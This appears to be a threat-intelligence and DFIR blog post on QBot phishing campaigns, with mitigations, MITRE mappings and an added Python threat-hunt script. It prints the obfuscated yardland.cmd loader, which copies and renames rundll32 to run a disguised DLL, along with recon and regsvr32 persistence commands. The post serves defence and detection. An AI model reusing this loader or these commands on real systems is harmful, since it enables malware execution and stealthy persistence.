Qbot Malware Phishing Trends: Detection vs Infection


QBot, also known as Qakbot, QuackBot, and Pinkslipbot, is a banking Trojan that was first observed in 2007. Today, QBot remains a dangerous and persistent threat to organizations and has become one of the leading banking Trojans globally. In the past month we have observed an increase in attacks; the actors appear to be targeting organizations to collect valuable information, which is then replayed against partner organizations. Knowing key details, and often including a fabricated email trail, makes the follow-on attack look legitimate.

To this day, QBot continues to grow and develop, with more capabilities and new techniques. Its main purpose is to steal banking data (banking credentials, online banking session information, victim’s personal details, etc.). However, its developers have also developed functionalities that allow QBot to spread itself, evade detection and debugging, and install additional malware on compromised machines, such as Cobalt Strike, REvil, ProLock, and Egregor ransomware.

The process used to obtain persistence has many layers of obfuscation: known DLL files and/or trusted system executables are used to inject into processes in an attempt to hide from EDR and antivirus solutions.

Qbot uses multiple attack vectors to infect victims. QBot is distributed through phishing emails containing malicious documents, attachments, or password-protected archives with the documents attached. Some versions of the malware were observed being distributed by a dropper, such as Emotet.

For the CISO

Today phishing emails present risks to most modern enterprises, and they continue to get more creative and advanced. We are currently seeing a rise in sophisticated phishing campaigns, often tailored to each enterprise. QBot malware is currently using DLL injection or DLL hijacking methods that exploit how Dynamic Link Libraries (DLLs) are loaded in Windows.

Adversaries may abuse rundll32.exe to proxy the execution of malicious code. Using rundll32.exe versus executing directly may help avoid detection and may also hide in a sea of log data often overlooked by enterprise security teams.

Chain of Attack

  • phishing email >> link OR HTML >> download zip >> unzip >> mount iso image >> autorun lnk >> rundll32 process injection >> persistence

Security Controls for CISO

Phishing Email

The attacks observed to date share a common theme: emails are sent from spoofed domains or email addresses, and the bodies often contain company references and historical email threads. As CISOs we should ensure minimum baselines when considering email risks and external user authentication.

  • Modern next-generation email protection (e.g. Proofpoint Email Protection)
  • DKIM, DMARC, and SPF records
  • SPF hard failure (-all) so that inbound spoofed emails are dropped
  • Backscatter protection on Office 365
  • MFA for email authentication
  • User education and phishing training

Initial Infection

Each phishing attack does require human intervention, so the human factor is the common weak link. Here is a short list of items identified and potential mitigation strategies.

  • Block non-standard attachments
    • Consider limiting corporate email attachments to Word documents, spreadsheets, PowerPoint and PDF, and ideally shift toward file-sharing services.
  • User Training
    • Staff should never interact with password-protected files, without verbal or physical confirmation that the sender is known.
  • GPO Policy
    • Remove autorun for external drives and mounted images, since this attachment leverages this Windows feature.


The last stage of the attack is where persistence and command and control are established. Visibility and mitigation are limited at this point; the horses have already left the barn. Regardless, it is very important to be using best-of-breed tools to ensure maximum effectiveness.

  • Utilize a next-generation EDR product such as CrowdStrike or Microsoft Defender
  • DNS filtering
  • Next-generation firewall (Fortinet / Palo Alto)
  • Security Operations and Threat Hunting team

However, the recon tools and tactics used after execution are very common and should be monitored.

  • whoami
  • net use
  • arp -a
  • registry key startup creation

If left unchecked for long enough, ransomware gangs, including Black Basta, Egregor, and ProLock, use the malware to gain initial access to corporate networks and then proceed to exfiltrate and encrypt data. I will continue to investigate the current Qbot attacks and convert this into a blue team threat hunt.

DFIR Summary


  • Masquerading – Mitre T1036 – renamed rundll32 executable was launched
  • Software Packing – Mitre T1027.002 – packed executable was written to disk
  • Process Injection – Mitre T1055 – rundll32 used to inject into a process
  • Persistence – Mitre TA0003 – registry start key was added
  • Process Injection – Mitre T1055 – muuopzfn.dll injected into wermgr.exe
  • Process Discovery – Mitre T1057 – running processes enumerated

Recon Commands

arp -a
net use
ipconfig /all

Detailed DFIR Investigation

Initial Payload

After clicking on the HTML payload a fake Adobe screen is presented, which triggers a zipped payload to be downloaded automatically. The file is a password-protected ZIP containing an ISO image that is set to autorun once mounted.

After unzipping the payload, we double-click the ISO image, which results in the following command being executed:

C:\Windows\system32\cmd.exe /c E:\yardland.cmd 

Yardland.cmd Script

SETLOCAL EnableDelayedExpansion
start unfeignedness_sitiophobia.png
set x3=run
set x2=dll
set x1=32
if %random% neq 100 (
    set tmp1=!x1!
    set x1=!x3!
    set x3=!tmp1!
) else (
    set tmp1=!x2!
    set x1=!x1!
    set x2=!tmp1!
)
set exe2=templ
set exe1=ates201.png
if %random% neq 200 (
    set tmp2=!exe1!
    set exe1=!exe2!
    set exe2=!tmp2!
) else (
    set tmp2=!x1!
    set exe1=!tmp2!
    set exe2=!x2!
)
if %random% neq 300 (
    set xxx=#1
) else (
    set xxx=unfeignedness_sitiophobia.png
)
echo f|xcopy %SystemRoot%\system32\%x1%%x2%%x3%.exe %temp%\companionably.exe /h /s /e
set t3=%temp%\%random%.%random%
echo f|xcopy !exe1!!exe2! %t3% /h /s /e
%temp%\companionably.exe %t3%,%xxx%

Initial Infection

The following Process tree illustrates the Parent-Child process relationship and each command which spawned from yardland.cmd execution.

Masquerading – Mitre T1036

A renamed rundll32 executable was launched. Adversaries can rename files to evade detection. Review the command line and process tree.

xcopy C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\companionably.exe /h /s /e

Software Packing – Mitre T1027.002

A packed executable has been written to disk. If this is unexpected, it might indicate suspicious activity. Review the process tree and related file written events.

xcopy templates201.png C:\Users\admin\AppData\Local\Temp\2694.7172 /h /s /e

Process Injection – Mitre T1055

Using rundll32 to inject into a process. A likely malicious process injected code into another process in a suspicious way.

C:\Users\admin\AppData\Local\Temp\companionably.exe C:\Users\admin\AppData\Local\Temp\2694.7172,#1

Persistence (Registry Key Added) – Mitre TA0003

A process made a suspicious change to the registry that may be indicative of a malicious persistence mechanism.

“C:\Windows\SysWOW64\CertEnrollCtrl.exe” was used to write the DLL “AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll”, which was then registered via regsvr32.exe:

regsvr32.exe "C:\Users\admin\AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll"
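As an added example (my code, not the author's or any captured tooling), a small Python threat-hunt pass over Sysmon-style process-creation events that flags the behaviours documented in this investigation and in the recon list under the security controls: a renamed rundll32, rundll32 loading a file from Temp by ordinal export, regsvr32 registering a DLL from the roaming profile, and a burst of recon commands under one parent. Field names follow Sysmon Event ID 1; the sample events, PIDs and timestamps are constructed to mirror the process tree above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon tools named in the post; three or more distinct ones under one parent within the window is a finding.
RECON = {"whoami.exe", "net.exe", "arp.exe", "ipconfig.exe"}
RECON_WINDOW = timedelta(minutes=2)

def hunt(events):
    """Run four rules over Sysmon Event ID 1 style dicts; return (rule, pid, detail) tuples."""
    findings, recon_by_parent = [], defaultdict(list)
    for e in events:
        img = e["Image"].rsplit("\\", 1)[-1].lower()
        orig, cmd, pid = e["OriginalFileName"].lower(), e["CommandLine"], e["ProcessId"]
        # Masquerading (T1036): the PE's OriginalFileName says rundll32 but the on-disk name differs.
        if orig == "rundll32.exe" and img != "rundll32.exe":
            findings.append(("renamed_rundll32", pid, e["Image"]))
        # Proxy execution: rundll32 (under any name) given a file under \Temp\ and an ordinal export (",#1").
        if orig == "rundll32.exe" and re.search(r"\\temp\\[^\s,]+,#\d+", cmd, re.I):
            findings.append(("rundll32_temp_ordinal", pid, cmd))
        # Persistence (TA0003): regsvr32 registering a DLL out of the roaming profile.
        if orig == "regsvr32.exe" and re.search(r"appdata\\roaming\\.*\.dll", cmd, re.I):
            findings.append(("regsvr32_roaming_dll", pid, cmd))
        if img in RECON:
            recon_by_parent[e["ParentProcessId"]].append((datetime.fromisoformat(e["UtcTime"]), img))
    # Discovery (T1057 and friends): a burst of distinct recon commands under one parent process.
    for ppid, runs in recon_by_parent.items():
        runs.sort()
        if len({n for _, n in runs}) >= 3 and runs[-1][0] - runs[0][0] <= RECON_WINDOW:
            findings.append(("recon_burst", ppid, ",".join(n for _, n in runs)))
    return findings

# Constructed sample telemetry modelled on the process tree in the post (PIDs and times are made up).
T = r"C:\Users\admin\AppData\Local\Temp"
def ev(t, pid, ppid, image, orig, cmd):
    return {"UtcTime": t, "ProcessId": pid, "ParentProcessId": ppid, "Image": image, "OriginalFileName": orig, "CommandLine": cmd}
SAMPLE = [
    ev("2023-03-01 10:22:31", 2792, 2100, T + r"\companionably.exe", "RUNDLL32.EXE", T + r"\companionably.exe " + T + r"\2694.7172,#1"),
    ev("2023-03-01 10:22:40", 3010, 2792, r"C:\Windows\System32\whoami.exe", "whoami.exe", "whoami"),
    ev("2023-03-01 10:22:44", 3022, 2792, r"C:\Windows\System32\net.exe", "net.exe", "net use"),
    ev("2023-03-01 10:22:49", 3031, 2792, r"C:\Windows\System32\ARP.EXE", "arp.exe", "arp -a"),
    ev("2023-03-01 10:23:02", 3100, 2900, r"C:\Windows\SysWOW64\regsvr32.exe", "REGSVR32.EXE",
       r'regsvr32.exe "C:\Users\admin\AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll"'),
    # Benign control: stock rundll32 loading a System32 DLL by export name must not be flagged.
    ev("2023-03-01 10:30:00", 4000, 900, r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE", "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for rule, pid, detail in hunt(SAMPLE):
        print(f"{rule:22} pid={pid:<5} {detail}")
```

The OriginalFileName comparison is what catches the xcopy-renamed binary; a rule keyed only on the image name would miss companionably.exe entirely.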

Investigation of “Muuopzfn.dll”

  • Process Injection – Mitre T1055
  • Process Discovery – Mitre T1057

Behavioural detections reported for the DLL (severity and detail as recorded):

  • Injection (Process Hollowing) – High – rundll32.exe (2792) -> wermgr.exe (1516)
  • Executed a process and injected code into it, probably while unpacking – High – rundll32.exe (2792) -> wermgr.exe (1516)
  • Accessed the NetLogon registry key, potentially used for discovery or tampering – Medium – regkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
  • Enumerated running processes – Medium – System (pid 4), smss.exe (268), csrss.exe (356), wininit.exe (392), csrss.exe (400), winlogon.exe (428), services.exe (488), lsass.exe (496), lsm.exe (504), svchost.exe (604) ….